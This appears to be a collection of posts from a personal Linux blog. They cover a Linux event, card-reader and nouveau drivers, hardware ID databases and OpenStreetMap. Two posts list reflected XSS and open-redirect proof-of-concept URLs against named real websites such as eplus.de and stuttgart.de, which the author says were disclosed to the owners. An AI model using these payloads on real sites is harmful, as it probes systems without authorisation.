It's terrifying how many sites there are out there with XSS-issues.

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>

Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters.

Napster and MPAA still unfixed.

No text, just some pictures here.

I'm here at the Linux-Infotag 2007 from the linux user group Augsburg. It's a small and familiar event. Seems that there are a lot of freifunk-people (free wlan networks) in augsburg. On my way to Augsburg, fitting to the topic I had to switch trains in the linux-town Treuchtlingen.

I had a talk about 3D-Desktops (Linux 3D-Slides, OpenDocument). Will stay for some more hours.
It's nice to see more local linux events evolving.

Update: Some pictures from the LIT 2007

My laptop (Samsung P35) has an internal card reader (SD and MemoryStick) done by Ricoh. Several other laptops have this device. It's internally connected as a pcmcia-device and shows up as RICOH Bay1Controller on pccardctl ident.

For years now there was no way to get this thing running in linux, which stopped me from doing projects like having a crypto-key on a small SD-Card and insert that on boot. Now, finally someone did the job and reverse engineered the device: sdricohcs

In my first small tests, I could already download some photos from my digital camera card. No problems so far. Now, the only thing I'm really missing with linux on my laptop left is TV-Out (works with ati binary drivers, but they are unstable like hell). I heared some Xorg-devs are already working on it, so maybe I'll soon announce the »nearby 100%« support for Linux on Samsung P30/P35.

I wrote a few days ago (only in german) about my requests to the 1und1-support for information about the hardware of our rootserver (to complete the PCI ID database).

Now, after their first reply, I now got another mail with more useful information: They pointed me to the tool dmidecode, which can find lot's of information about the BIOS and the motherboard. Didn't know that before, it's also useful to find out the BIOS version on a running system.

Now, this looks like what I was looking for:
Handle 0x0002, DMI type 2, 8 bytes
Base Board Information
Manufacturer: FUJITSU SIEMENS
Product Name: D2030-A1

Note: This is just a short form of a german article I posted today. E-Plus is a big german mobile telephony provider. I've found a bunch of XSS together with Alexander Brachmann (responsible disclosure, all reported to E-Plus before, probably more to come).

For my english visitors, here are the urls:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('

Already fixed ones:
http://www.eplus.de/frame.asp?go=http://www.google.de/
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com

A thing that people often ask in the free software world: I can't program but I want to help out somewhere.

Theres one thing that's very simple to do for everyone using Linux. We have two tools called lspci and lsusb that look on the pci/usb-bus for installed devices. Each device has an ID, consisting of a vendor ID and a product ID. Everyone can check the own hardware if everything is detectet. For lspci, first run update-pciids, then lspci -v. Each »Unknown« represents some ID that's not in pci.ids. Report the exact device model name to the interface on http://pciids.sourceforge.net/.
For lsusb, run update-usbids and attach all usb devices you can find. lsusb doesn't show Unknown, if after a device number there's only a vendor name, then the ID is unknown. The usb.ids database is much more incomplete than the pci database. They don't have such a fancy interface as pciids, just send it to the current maintainer (listed in the file usually at /usr/share/misc/usb.ids or /usr/share/usb.ids).

I'm actively participating in the OpenStreetMap project since about a week. Today I tagged two roads google maps doesn't know about (so at least in one very small part of the world osm is more accurate than google).
They're the Euro- and D-Mark street in Murrhardt. And yes, they invent stupid street names here.

Binary drivers are imho a hughe problem for free software. Nvidia, leading graphics company, has produced binary linux drivers for a long time and there was no way to get free software 3D-support on their cards.
A group of people is working at the moment on a free nvidia driver, the project is called nouveau. I now had a chance to test the nouveau driver on a nvidia card (nv43). It doesn't do much at the moment, but at least it runs glxgears almost smooth.

It's nice to see development on that front. We made a small video of glxgears running on nouveau. Oh, for all those who can't play theora, I put it up on youtube (but seriously, was just curious how youtube works and if it accepts theora).

Some experimental nouveau-ebuilds, maintained by pq from the nouveau-project, are here:
svn co https://svn.hboeck.de/nouveau-overlay